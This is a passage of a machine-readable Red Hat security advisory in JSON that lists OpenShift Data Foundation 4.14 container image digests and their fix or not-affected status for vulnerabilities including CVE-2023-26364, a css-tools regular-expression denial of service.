"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tough-cookie: prototype pollution in cookie memstore"
},
{
"cve": "CVE-2023-26364",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2023-11-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2250364"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
